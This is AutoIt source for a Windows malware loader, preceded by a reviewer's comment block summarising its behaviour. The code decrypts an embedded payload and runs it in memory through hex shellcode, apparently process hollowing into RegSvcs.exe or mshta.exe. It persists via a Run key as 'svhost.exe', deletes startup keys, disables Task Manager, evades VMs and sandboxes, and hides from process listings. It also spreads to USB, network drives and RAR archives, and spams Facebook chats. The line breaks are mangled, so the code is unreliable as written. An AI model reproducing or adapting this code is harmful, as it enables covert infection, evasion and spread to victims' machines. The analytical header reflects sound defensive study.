; NOTE(review): this is AutoIt source (Func/EndFunc, @AutoItExe and other @ macros), not Perl.
; The original line breaks were lost in extraction: statements run together and the remaining
; breaks fall mid-statement, so the text is kept byte-for-byte below and is not parseable as-is.
; Single-line `If ... Then stmt` forms cannot always be told apart from block `If`s (the first
; `If NOT FileExists` region has three `If`s but only two `EndIf`s), so nesting there is uncertain.
;
; Purpose, as far as the visible code shows: a loader stub that keeps its configuration and an
; encrypted payload inside its own file, and that can persist, evade analysis and copy itself.
;
; Configuration and feature switches
;   - IniRead on @ScriptFullPath, key "key", sections "crypted" ($c_pass), "random" ($var, also
;     $randoms), "binder" ($var2) and "fbmessage" ($fbmessage).
;   - $path holds the bytes of @AutoItExe. Marker strings found in it select handlers by name:
;     /-confuser-/ confuser, /-disable-/ avdisable, /-usb-/ usb, /-network-/ network,
;     /-antivm-/ vm, /-start-/ startup, /-melt-/ melt, /-task-/ task, /-sandbox-/ sandbox,
;     /-hide-/ hide, -rar- rar_spread, -facebook- FaceBook_Timer, -loop- loop.
;     /-inject-/ creates %USERPROFILE%\<random>\jects.txt; /-net2-/ is read inside _runpe().
;
; Embedded data (get_binded_settings() returns everything after the first occurrence of a marker)
;   - Bound file: bytes between "[JY]" and "[J_Y]", file name between "[J_Y]" and "[J_END_Y]";
;     written to %USERPROFILE%\<binder>\<name>, directory set +SH, started through
;     `cmd /C Start` with a hidden window when the file is larger than 30 bytes.
;   - Payload: submain() takes the bytes after "\\carbons\\" up to "//J_Y//", decrypts them with
;     _crypt_decryptdata($data, $c_pass, $calg_rc2) and passes the result to _runpe().
;     _crypt_decryptdata and $calg_rc2 are not defined here -- presumably the Crypt.au3 UDF; confirm.
;   - net2()/net4() write the bytes between [Snet2]/[Enet2] and [Snet4]/[Enet4] to net2.exe and
;     net4.exe under %USERPROFILE%\<random>\; no call to either is visible in this text.
;
; In-memory execution
;   - _runpe() copies the bytes returned by shell() and the decrypted binary into DllStruct buffers
;     and calls user32!CallWindowProcW with the shell() buffer pointer as the procedure argument,
;     a host executable path and the binary pointer. Host path: RegSvcs.exe under .NET v4.0.30319
;     (else v2.0.50727) when /-net2-/ is set, %WINDIR%\system32\mshta.exe when jects.txt exists,
;     otherwise @AutoItExe.
;   - What the shell() bytes do is not established by this text; the function name and the
;     host-path argument suggest process hollowing -- confirm by disassembly before relying on it.
;
; Behaviours a defender can observe (all taken from the calls below)
;   - Persistence: startup() copies the executable to %USERPROFILE%\<random>\svhost.exe (+SH) and
;     writes an HKCU ...\CurrentVersion\Run value named <random> pointing at it.
;   - Tampering: avdisable2() issues RegDelete on the Run keys under HKLM64, HKLM64 Wow6432Node and
;     HKCU64; task() sets DisableTaskMgr=1 under HKCU64 ...\Policies\System.
;   - Evasion: vm() queries WMI Win32_ComputerSystem / Win32_BIOS and exits on the Hyper-V, Virtual
;     PC, VMware and VirtualBox model/BIOS strings listed; sandbox() exits when
;     WinGetText("Program Manager") = "0"; melt() moves the script to %USERPROFILE%, reruns it and
;     sets +SH; hide() sends message 4104 (0x1008, LVM_DELETEITEM) to a SysListView32 control for
;     the row matching @ScriptName (_guictrllistview_findtext is not defined here -- presumably
;     GuiListView.au3); loop() re-registers hide() every 250 ms.
;   - Self-copying: usb() copies the executable to the root of every drive with free space > 100,
;     network() does the same for drives of type "Network"; rar_spread() runs only when
;     %ProgramFiles%\WinRar\rar.exe exists and %TEMP%\rar.dat does not, lists *.rar through a
;     hidden <drive>\autoexec.bat into <drive>\system.bin, and adds %TEMP%\KeyGen.exe to each
;     archive with `rar.exe a`.
;   - Input abuse: facebook() checks GetAsyncKeyState for key 0x0D while a window titled
;     "Facebook -" is active, then pastes $fbmessage from the clipboard and sends ENTER.
;   - Noise: confuser() starts mshta.exe and runs `taskkill /IM mshta.exe` seven times, 5 s apart.
;   - Marker files: %USERPROFILE%\once.txt, %USERPROFILE%\disable.txt,
;     %USERPROFILE%\<random>\jects.txt, %TEMP%\rar.dat.
$autoit = @AutoItExe $path = FileRead($autoit, FileGetSize($autoit)) Local $c_pass = IniRead(@ScriptFullPath, "crypted", "key", "NotFound") Local $var = IniRead(@ScriptFullPath, "random", "key", "NotFound") Local $var2 = IniRead(@ScriptFullPath, "binder", "key", "NotFound") Local $fbmessage = IniRead(@ScriptFullPath, "fbmessage", "key", "NotFound") $randoms = $var $confuser = "/-confuser-/" If NOT FileExists(@UserProfileDir & "\" & $var2) Then $file_settings = "" $fuckname = @ScriptFullPath $o_c = FileOpen($fuckname) $r_c = FileRead($o_c) FileClose($o_c) $empty_settings = get_binded_settings($r_c, "[JY]") $file_settings = get_binded_settings($empty_settings, "[J_Y]") $binary_of_server = StringTrimRight($empty_settings, StringLen($file_settings) + StringLen("[J_Y]")) If $file_settings <> "" Then DirCreate(@UserProfileDir & "\" & $var2) $fget = get_binded_settings($r_c, "[J_Y]") $oget = get_binded_settings($fget, "[J_END_Y]") $binname = StringTrimRight($fget, StringLen($oget) + StringLen("[J_END_Y]")) $binname = BinaryToString($binname) FileWrite(@UserProfileDir & "\" & $var2 & "\" & $binname, $binary_of_server) $filepath = FileGetShortName(@UserProfileDir & "\" & $var2 & "\" & $binname) FileSetAttrib(@UserProfileDir & "\" & $var2 & "\", "+SH") If FileGetSize($filepath) > 30 Then RunWait(@ComSpec & " /C Start " & $filepath, "", @SW_HIDE) EndIf EndIf If StringInStr($path, $confuser) Then Call("confuser") Else EndIf $disable = "/-disable-/" If StringReplace($path, $disable, "") <> $path Then Call("avdisable") Else EndIf $usb = "/-usb-/" If StringInStr($path, $usb) Then Call("usb") Else EndIf $network = "/-network-/" If StringInStr($path, $network) Then Call("network") Else EndIf $vm = "/-antivm-/" If StringInStr($path, $vm) Then Call("vm") Else EndIf $start = "/-start-/" If StringInStr($path, $start) Then Call("startup") Else EndIf $melt = "/-melt-/" If StringInStr($path, $melt) Then Call("melt") Else EndIf $inject = "/-inject-/" If StringReplace($path, $inject, "") <> 
$path Then DirCreate(@UserProfileDir & "\" & $randoms & "\") DirCreate(@UserProfileDir & "\" & $randoms & "\") FileWrite(@UserProfileDir & "\" & $randoms & "\jects.txt", "") DirCreate(@UserProfileDir & "\" & $randoms & "\") Else EndIf Func get_binded_settings($getfiledata, $stringtoget) Return StringTrimLeft($getfiledata, StringInStr($getfiledata, $stringtoget) - 1 + StringLen($stringtoget)) EndFunc $task = "/-task-/" If StringInStr($path, $task) Then Call("task") Else EndIf $sandbox = "/-sandbox-/" If StringInStr($path, $sandbox) Then Call("sandbox") Else EndIf $hide = "/-hide-/" If StringInStr($path, $hide) Then Call("hide") Else EndIf Func melt() $pathto = @UserProfileDir If FileGetShortName(@ScriptDir) = FileGetShortName($pathto) Then Else FileMove(@ScriptFullPath, $pathto & "\" & @ScriptName, 1) Run($pathto & "\" & @ScriptName) FileSetAttrib(@UserProfileDir & "\" & @ScriptName, "+SH") Exit EndIf EndFunc Func _random($imin, $imax, $iinteger = 0) Local $irandom = Random($imin, $imax, $iinteger) If @error Then Return $imin EndIf Return $irandom EndFunc Func _rundos($scommand) Local $nresult = RunWait(@ComSpec & " /C " & $scommand, "", @SW_HIDE) Return SetError(@error, @extended, $nresult) EndFunc Func confuser() $counter = 0 While $counter <= 6 Sleep(5000) ShellExecute(@SystemDir & "\mshta.exe") $counter = $counter + 1 _rundos("taskkill /IM mshta.exe") WEnd EndFunc Func usb() $gweg = DriveGetDrive("ALL") If IsArray($gweg) Then For $i = 1 To $gweg[0] If DriveSpaceFree($gweg[$i]) > 100 Then FileCopy(@AutoItExe, $gweg[$i] & "\" & @ScriptName) EndIf Next EndIf EndFunc Func network() $gwh = DriveGetDrive("all") If NOT @error Then For $i = 1 To $gwh[0] $type = DriveGetType($gwh[$i]) If $type = "Network" Then If DriveSpaceFree($gwh[$i] & "\") > 10 Then Sleep(10) FileCopy(@AutoItExe, $gwh[$i] & "\" & @ScriptName) Sleep(10) EndIf EndIf Next EndIf EndFunc Func sandbox() If WinGetText("Program Manager") = "0" Then Exit Else EndIf EndFunc Func vm() Local $strcomputer = ".", 
$smake, $smodel, $sbiosversion, $bisvm, $svmplatform Local $objwmiservice = ObjGet("winmgmts:\\" & $strcomputer & "\root\CIMV2") Local $colitems = $objwmiservice.execquery("SELECT * FROM Win32_ComputerSystem") If IsObj($colitems) Then For $objitem In $colitems $smake = $objitem.manufacturer $smodel = $objitem.model Next EndIf $colitems = $objwmiservice.execquery("SELECT * FROM Win32_BIOS", "WQL", 16 + 32) If IsObj($colitems) Then For $objitem In $colitems $sbiosversion = $objitem.smbiosbiosversion Next EndIf $bisvm = False $svmplatform = "" If $smodel = "Virtual Machine" Then $svmplatform = "Hyper-V" $bisvm = True Switch $sbiosversion Case "VRTUAL - 1000831" $bisvm = True $svmplatform = "Hyper-V 2008 Beta or RC0" Case "VRTUAL - 5000805", "BIOS Date: 05/05/08 20:35:56 Ver: 08.00.02" $bisvm = True $svmplatform = "Hyper-V 2008 RTM" Case "VRTUAL - 3000919" $bisvm = True $svmplatform = "Hyper-V 2008 R2" Case "A M I - 2000622" $bisvm = True $svmplatform = "VS2005R2SP1 or VPC2007" Case "A M I - 9000520" $bisvm = True $svmplatform = "VS2005R2" Case "A M I - 9000816", "A M I - 6000901" $bisvm = True $svmplatform = "Windows Virtual PC" Case "A M I - 8000314" $bisvm = True $svmplatform = "VS2005 or VPC2004" EndSwitch ElseIf $smodel = "VMware Virtual Platform" Then $svmplatform = "VMware" $bisvm = True ElseIf $smodel = "VirtualBox" Then $bisvm = True $svmplatform = "VirtualBox" Else EndIf If $bisvm Then Exit Else EndIf Return $bisvm EndFunc Func avdisable() If FileExists(@UserProfileDir & "\once.txt") Then Else Call("avdisable2") FileWrite(@UserProfileDir & "\once.txt", "once") EndIf EndFunc Func avdisable2() If NOT FileExists(@UserProfileDir & "\" & "disable.txt") Then FileWrite(@UserProfileDir & "\disable.txt", "disable") RegDelete("HKLM64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") RegDelete("HKLM64\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run") RegDelete("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") 
RegWrite("HKCU64\SOFTWARE\Microsoft\Windows\CurrentVersion\Run") Else EndIf EndFunc Func startup() If NOT FileExists(@UserProfileDir & "\" & $randoms & "\") Then dcreat(@UserProfileDir & "\" & $randoms & "\") FileCopy(@AutoItExe, @UserProfileDir & "\" & $randoms & "\svhost.exe", 1) FileSetAttrib(@UserProfileDir & "\" & $randoms & "\svhost.exe", "+SH") FileSetAttrib(@UserProfileDir & "\" & $randoms & "\", "+SH") RegWrite("HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run", $randoms, "REG_SZ", @UserProfileDir & "\" & $randoms & "\" & "svhost.exe") Else EndIf EndFunc Func dcreat($var) DirCreate($var) EndFunc Func task() RegWrite("HKCU64\Software\Microsoft\Windows\CurrentVersion\Policies\System", "DisableTaskMgr", "REG_DWORD", "1") EndFunc Func hide() $hwnd = ControlGetHandle("", "", "[CLASS:SysListView32]") $line = _guictrllistview_findtext($hwnd, @ScriptName) DllCall("user32.dll", "int", "SendMessage", "hwnd", $hwnd, "int", 4104, "int", $line, "int", "0") EndFunc Func facebook_timer() $min = @MIN + 1 $msg = $fbmessage While 1 Sleep(10) If @MIN >= $min Then facebook($msg) EndIf Sleep(10) WEnd EndFunc Func facebook($msg) $dll = DllOpen("user32.dll") Sleep(2) If _ispressed("0D", $dll) AND WinActive("Facebook -") = True Then ClipPut($msg) Send("^v{ENTER}") Sleep(1) ClipPut("") $min = @MIN + 1 If $min > 60 Then $min = $min - 60 EndIf EndIf DllClose($dll) EndFunc $vdll = "user32.dll" Func _ispressed($shexkey, $vdll) Local $a_r = DllCall($vdll, "short", "GetAsyncKeyState", "int", "0x" & $shexkey) If @error Then Return SetError(@error, @extended, False) Return BitAND($a_r[0], 32768) <> 0 EndFunc submain() Func submain() $sapppath = @ScriptFullPath $skey = "\\carbons\\" $appexe = $sapppath $sarquive = FileRead($sapppath) $r_xcrypted = get_binded_settings($sarquive, $skey) $r_xzeros = get_binded_settings($r_xcrypted, "//J_Y//") $encrypted_xfile = StringTrimRight($r_xcrypted, StringLen($r_xzeros) + StringLen("//J_Y//")) $sarquive = 
_crypt_decryptdata($encrypted_xfile, $c_pass, $calg_rc2) Call(_runpe($sarquive)) EndFunc Func slenex($sstr) Local $result, $i, $blen Do $i = $i + 1 $blen = StringLeft($sstr, $i) $result = $i Until $sstr = $blen Return $result EndFunc Func _runpe($binary) If $binary = "" Then Exit $asm = shell() Local $bufferasm = DllStructCreate("byte[" & BinaryLen($asm) & "]") Local $binbuffer = DllStructCreate("byte[" & BinaryLen($binary) & "]") DllStructSetData($bufferasm, 1, $asm) DllStructSetData($binbuffer, 1, $binary) $net2 = "/-net2-/" If StringInStr($path, $net2) Then $injecto = @WindowsDir & "\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" If FileExists($injecto) Then Local $ret = DllCall("user32.dll", "int", "CallWindowProcW", "ptr", DllStructGetPtr($bufferasm), "wstr", $injecto, "ptr", DllStructGetPtr($binbuffer), "int", 0, "int", 0) Else $injecto2 = @WindowsDir & "\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe" Local $ret = DllCall("user32.dll", "int", "CallWindowProcW", "ptr", DllStructGetPtr($bufferasm), "wstr", $injecto2, "ptr", DllStructGetPtr($binbuffer), "int", 0, "int", 0) EndIf EndIf If FileExists(@UserProfileDir & "\" & $randoms & "\jects.txt") Then Local $ret = DllCall("user32.dll", "int", "CallWindowProcW", "ptr", DllStructGetPtr($bufferasm), "wstr", @WindowsDir & "\system32\mshta.exe", "ptr", DllStructGetPtr($binbuffer), "int", 0, "int", 0) Else EndIf $net2 = "/-net2-/" If NOT FileExists(@UserProfileDir & "\" & $randoms & "\jects.txt") Then If NOT StringInStr($path, $net2) Then Local $ret = DllCall("user32.dll", "int", "CallWindowProcW", "ptr", DllStructGetPtr($bufferasm), "wstr", @AutoItExe, "ptr", DllStructGetPtr($binbuffer), "int", 0, "int", 0) Else EndIf EndIf EndFunc Func shell() Local $asm = 
"0x60E84E0000006B00650072006E0065006C003300320000006E00740064006C006C0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000005B8BFC6A42E8BB0300008B54242889118B54242C6A3EE8AA03000089116A4AE8A103000089396A1E6A3CE89D0300006A2268F4000000E8910300006A266A24E8880300006A2A6A40E87F030000" $asm &= "6A2E6A0CE8760300006A3268C8000000E86A0300006A2AE85C0300008B09C701440000006A12E84D030000685BE814CF51E8790300006A3EE83B0300008BD16A1EE8320300006A40FF32FF31FFD06A12E823030000685BE814CF51E84F0300006A1EE8110300008B098B513C6A3EE8050300008B3903FA6A22E8FA0200008B0968F80000005751FFD06A00E8E80200006888FEB31651E8140300006A2EE8D60200" $asm &= "008B396A2AE8CD0200008B116A42E8C402000057526A006A006A046A006A006A006A00FF31FFD06A12E8A902000068D03710F251E8D50200006A22E8970200008B116A2EE88E0200008B09FF7234FF31FFD06A00E87E020000689C951A6E51E8AA0200006A22E86C0200008B118B396A2EE8610200008B096A406800300000FF7250FF7734FF31FFD06A36E8470200008BD16A22E83E0200008B396A3EE8350200" $asm &= "008B316A22E82C0200008B016A2EE8230200008B0952FF775456FF7034FF316A00E81002000068A16A3DD851E83C02000083C40CFFD06A12E8F9010000685BE814CF51E8250200006A22E8E70100008B1183C2066A3AE8DB0100006A025251FFD06A36E8CE010000C70100000000B8280000006A36E8BC010000F7216A1EE8B30100008B118B523C81C2F800000003D06A3EE89F01000003116A26E8960100006A" $asm &= "2852FF316A12E88A010000685BE814CF51E8B601000083C40CFFD06A26E8730100008B398B098B71146A3EE86501000003316A26E85C0100008B098B510C6A22E8500100008B090351346A46E8440100008BC16A2EE83B0100008B0950FF77105652FF316A00E82A01000068A16A3DD851E85601000083C40CFFD06A36E8130100008B1183C20189116A3AE8050100008B093BCA0F8533FFFFFF6A32E8F4000000" $asm &= "8B09C701070001006A00E8E500000068D2C7A76851E8110100006A32E8D30000008B116A2EE8CA0000008B0952FF7104FFD06A22E8BB0000008B3983C7346A32E8AF0000008B318BB6A400000083C6086A2EE89D0000008B116A46E894000000516A045756FF326A00E88600000068A16A3DD851E8B200000083C40CFFD06A22E86F0000008B098B51280351346A32E8600000008B0981C1B000000089116A00E8" $asm &= 
"4F00000068D3C7A7E851E87B0000006A32E83D0000008BD16A2EE8340000008B09FF32FF7104FFD06A00E82400000068883F4A9E51E8500000006A2EE8120000008B09FF7104FFD06A4AE8040000008B2161C38BCB034C2404C36A00E8F2FFFFFF6854CAAF9151E81E0000006A406800100000FF7424186A00FFD0FF742414E8CFFFFFFF890183C410C3E82200000068A44E0EEC50E84B00000083C408FF742404" $asm &= "FFD0FF74240850E83800000083C408C355525153565733C0648B70308B760C8B761C8B6E088B7E208B3638471875F3803F6B7407803F4B7402EBE78BC55F5E5B595A5DC35552515356578B6C241C85ED74438B453C8B54287803D58B4A188B5A2003DDE330498B348B03F533FF33C0FCAC84C07407C1CF0D03F8EBF43B7C242075E18B5A2403DD668B0C4B8B5A1C03DD8B048B03C55F5E5B595A5DC3C300000000" Return $asm EndFunc $rarspread = "-rar-" If StringInStr($path, $rarspread) Then Call("rar_spread") Else EndIf $facebook = "-facebook-" If StringInStr($path, $facebook) Then Call("FaceBook_Timer") Else EndIf $loop = "-loop-" If StringInStr($path, $loop) Then Call("loop") Else EndIf Func loop() While 1 AdlibRegister("hide", 1) Sleep(250) WEnd EndFunc Func net2() If NOT FileExists(@UserProfileDir & "\" & $randoms & "\net2.exe") Then $o_c = FileOpen(@ScriptFullPath) $r_c = FileRead($o_c) FileClose($o_c) $empty_settings = get_binded_settings($r_c, "[Snet2]") $file_settings = get_binded_settings($empty_settings, "[Enet2]") $binary_of_server = StringTrimRight($empty_settings, StringLen($file_settings) + StringLen("[Enet2]")) FileWrite(@UserProfileDir & "\" & $randoms & "\net2.exe", $binary_of_server) EndIf EndFunc Func net4() If NOT FileExists(@UserProfileDir & "\" & $randoms & "\net4.exe") Then $o_c = FileOpen(@ScriptFullPath) $r_c = FileRead($o_c) FileClose($o_c) $empty_settings = get_binded_settings($r_c, "[Snet4]") $file_settings = get_binded_settings($empty_settings, "[Enet4]") $binary_of_server = StringTrimRight($empty_settings, StringLen($file_settings) + StringLen("[Enet4]")) FileWrite(@UserProfileDir & "\" & $randoms & "\net4.exe", $binary_of_server) EndIf EndFunc Func rar_spread() If FileExists(@ProgramFilesDir & 
"\WinRar\rar.exe") AND NOT FileExists(@TempDir & "\rar.dat") Then FileWrite(@TempDir & "\rar.dat", "rar") $drive = DriveGetDrive("ALL") If IsArray($drive) Then For $i = 1 To $drive[0] If DriveSpaceFree($drive[$i]) > 100 Then search_dir_rar($drive[$i] & "\") EndIf Next EndIf Else Return 0 EndIf EndFunc Func search_dir_rar($driver) If DriveSpaceFree($driver) > 1000 Then FileCopy(@AutoItExe, @TempDir & "\KeyGen.exe") search_rar_bin($driver) $file = FileOpen($driver & "system.bin", 0) $s = 1 While 1 $line = FileReadLine($file) If @error Then ExitLoop $shortname = FileGetShortName($line) ConsoleWrite($shortname & @CRLF) _winrarspeard($shortname, FileGetShortName(@TempDir & "\KeyGen.exe")) $s = $s + 1 WEnd $s = 1 FileSetAttrib($driver & "autoexec.bat", "-H") FileSetAttrib($driver & "system.bin", "-H") Sleep(10) FileDelete($driver & "autoexec.bat") FileDelete($driver & "system.bin") EndIf EndFunc Func _winrarspeard($winrarfile, $infectedfile) Sleep(100) RunWait(@ProgramFilesDir & "\WinRar\rar.exe a -ag- -ep1 -r0 -iext -- " & $winrarfile & " " & $infectedfile, "", @SW_HIDE) Sleep(10) EndFunc Func search_rar_bin($driver) FileDelete($driver & "autoexec.bat") FileDelete($driver & "system.bin") $scmdfile = "cd\" & @CRLF & "dir *.rar /b /s >> system.bin" FileWrite($driver & "autoexec.bat", $scmdfile) FileSetAttrib($driver & "autoexec.bat", "+H") RunWait($driver & "autoexec.bat", $driver, @SW_HIDE) FileSetAttrib($driver & "system.bin", "+H") EndFunc